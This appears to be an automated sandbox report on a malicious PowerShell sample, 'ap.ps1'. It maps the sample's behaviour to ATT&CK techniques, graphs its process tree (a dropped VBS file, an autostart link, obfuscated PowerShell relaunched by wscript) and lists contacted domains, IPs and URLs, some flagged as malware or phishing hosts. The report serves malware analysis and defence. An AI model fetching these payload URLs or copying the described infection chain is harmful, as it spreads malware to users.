          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts12
          Command and Scripting Interpreter          		111
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568999 Sample: ap.ps1 Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 30 www.fornid.com 2->30 32 fornid.com 2->32 34 5 other IPs or domains 2->34 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 9 powershell.exe 16 23 2->9         started        signatures3 process4 dnsIp5 40 fornid.com 93.95.216.175, 443, 49728 SERVERPLAN-ASIT Italy 9->40 42 www.pineappletech.ae 91.193.42.13, 443, 49741 ITFPL Belgium 9->42 28 C:\Users\Public\sz3.vbs, ASCII 9->28 dropped 52 Powershell creates an autostart link 9->52 14 wscript.exe 1 9->14         started        17 powershell.exe 23 9->17         started        19 conhost.exe 9->19         started        file6 signatures7 process8 signatures9 54 Suspicious powershell command line found 14->54 56 Wscript starts Powershell (via cmd or directly) 14->56 58 Obfuscated command line found 14->58 62 2 other signatures 14->62 21 powershell.exe 35 14->21         started        60 Loading BitLocker PowerShell Module 17->60 process10 dnsIp11 36 erp-royal-crown.info 148.251.114.233, 443, 49784, 49813 HETZNER-ASDE Germany 21->36 38 almrwad.com 184.171.244.231, 443, 49754, 49770 DIMENOCUS United States 21->38 24 conhost.exe 21->24         started        26 cmd.exe 1 21->26         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          ap.ps129%ReversingLabsScript-PowerShell.Trojan.PShell
          ap.ps1100%AviraTR/PShell.Dldr.VPA

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.almrwad.com/w0%Avira URL Cloudsafe
          https://www.fornid.com/ordine0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordine0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordiner0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerende100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerend100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordineren100%Avira URL Cloudphishing
          https://www.almrwad.com/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Su0%Avira URL Cloudsafe
          http://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.almrwad.c0%Avira URL Cloudsafe
          https://www.pineappletech.ae/na/mg.vbs100%Avira URL Cloudmalware
          https://www.fornid.com/90-maschere-per-saldatura0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordine100%Avira URL Cloudphishing
          http://www.pineappletech.ae0%Avira URL Cloudsafe
          https://www.fornid.com/133-occhiali-protettivi0%Avira URL Cloudsafe
          https://www.erp-royal-crown.i0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordin0%Avira URL Cloudsafe
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/100%Avira URL Cloudphishing
          https://www.fornid.com/contattaci0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subord0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/0%Avira URL Cloudsafe
          https://go.micro0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes70%Avira URL Cloudsafe
          https://www.almrwad.com0%Avira URL Cloudsafe
          https://www.fornid.com0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf100%Avira URL Cloudmalware
          https://www.almrwad.com/wh/Subordinerendes78.s0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerende0%Avira URL Cloudsafe
          http://www.fornid.com/0%Avira URL Cloudsafe
          https://www.fornid.com/144-filtri-per-maschere0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.sm0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdf0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes780%Avira URL Cloudsafe
          http://almrwad.com0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subord100%Avira URL Cloudphishing
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp30%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/w100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smi100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          https://www.erp-royal-crown.0%Avira URL Cloudsafe
          http://fornid.com0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh100%Avira URL Cloudphishing
          https://www.fornid.com/sitemap0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinere100%Avira URL Cloudphishing
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro0%Avira URL Cloudsafe
          https://www.fornid.com/145-maschere-antigas0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerend0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subor100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordi100%Avira URL Cloudphishing
          https://www.fornid.com/il-mio-account0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subo100%Avira URL Cloudphishing
          http://www.almrwad.com0%Avira URL Cloudsafe
          https://www.erp-royal-crown.in0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinere0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordi0%Avira URL Cloudsafe
          https://www.almrwad.co0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.0%Avira URL Cloudsafe
          http://erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerendes100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordinerendes78.s100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordin100%Avira URL Cloudphishing
          https://www.fornid.com/img/logo.jpg0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subo0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sub0%Avira URL Cloudsafe
          https://www.almrwad.com/wh0%Avira URL Cloudsafe
          http://blog.fornid.com/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78100%Avira URL Cloudphishing
          http://www.fornid.com/content/13-international-shipments0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subor0%Avira URL Cloudsafe
          https://www.almrwad.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes7100%Avira URL Cloudphishing
          https://www.pinualapplualtualch.aual/na/mg.vbs0%Avira URL Cloudsafe
          http://www.fornid.com0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/100%Avira URL Cloudphishing
          https://www.fornid.com/cerca0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordineren0%Avira URL Cloudsafe
          https://www.erp-royal-crown.inf0%Avira URL Cloudsafe
          http://crl.m0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          erp-royal-crown.info
          		148.251.114.233
          		truefalse
            		unknown
            almrwad.com
            		184.171.244.231
            		truefalse
              		unknown
              fornid.com
              		93.95.216.175
              		truetrue
                		unknown
                www.pineappletech.ae
                		91.193.42.13
                		truefalse
                  		unknown
                  www.fornid.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.almrwad.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.erp-royal-crown.info
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.pineappletech.ae/na/mg.vbstrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdftrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.erp-royal-crown.info/wh/Subordinerendes78.smitrue
                        • Avira URL Cloud: phishing
                        		unknown
                        https://www.almrwad.com/wh/Subordinerendes78.smifalse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.almrwad.com/wpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/ordinepowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinepowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinerpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/wh/Listpowershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.microsoft.copowershell.exe, 00000002.00000002.1606334423.000002CD5FBA0000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.almrwad.com/wh/Supowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerenpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendepowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.com/powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.erp-royal-crown.infopowershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F219EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.cpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.infopowershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22602000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1599621623.000002CD57BF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1599621623.000002CD57D3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1428247268.000001B6547E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31357000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.erp-royal-crown.info/wh/Subordinepowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
                            http://www.pineappletech.aepowershell.exe, 00000002.00000002.1544764265.000002CD49AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/133-occhiali-protettivipowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.erp-royal-crown.ipowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.fornid.com/themes/PRS070158/css/megnor/custom.csspowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1544764265.000002CD47B81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B644771000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F211A1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.almrwad.com/wh/Subordinpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.erp-royal-crown.info/wh/powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: phishing
                              		unknown
                              https://www.almrwad.com/wh/Subordinerendes7powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://www.almrwad.com/wh/Subordpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645A83000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://www.fornid.com/contattacipowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.almrwad.com/wh/powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.almrwad.com/wh/Subordinerendespowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.micropowershell.exe, 00000002.00000002.1544764265.000002CD487B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B6456C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1410489118.000001B645D99000.00000004.00000800.00020000.00000000.sdmptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Iconpowershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.almrwad.compowershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22AA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22220000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.fornid.compowershell.exe, 00000002.00000002.1544764265.000002CD49658000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendepowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.almrwad.com/wh/Subordinerendes78.spowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.jspowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.almrwad.com/wh/Subordinerendes78.smpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2553289549.0000022F213CE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.fornid.com/powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.fornid.com/wh/List%20of%20rualquiruald%20itualms%20and%20sualrvicuals.pdfpowershell.exe, 00000002.00000002.1544764265.000002CD491B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://almrwad.compowershell.exe, 00000009.00000002.2553289549.0000022F222D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F2170D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F21A39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22247000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F220B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2553289549.0000022F22464000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.fornid.com/144-filtri-per-mascherepowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.almrwad.com/wh/Subordinerendes78powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.erp-royal-crown.info/wh/Subordpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: phishing
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000005.00000002.1410489118.000001B644999000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp3powershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.powershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://fornid.compowershell.exe, 00000002.00000002.1544764265.000002CD4965D000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.erp-royal-crown.info/wh/Subordinerepowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.erp-royal-crown.info/whpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: phishing
                                              		unknown
                                              https://www.fornid.com/sitemappowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoropowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.fornid.com/145-maschere-antigaspowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1544764265.000002CD4967E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/Licensepowershell.exe, 00000009.00000002.2646911553.0000022F31214000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.almrwad.com/wh/Subordinerendpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Subordipowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.erp-royal-crown.info/wh/Suborpowershell.exe, 00000009.00000002.2553289549.0000022F228A9000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: phishing
                                                		unknown
                                                https://www.fornid.com/il-mio-accountpowershell.exe, 00000002.00000002.1544764265.000002CD49682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
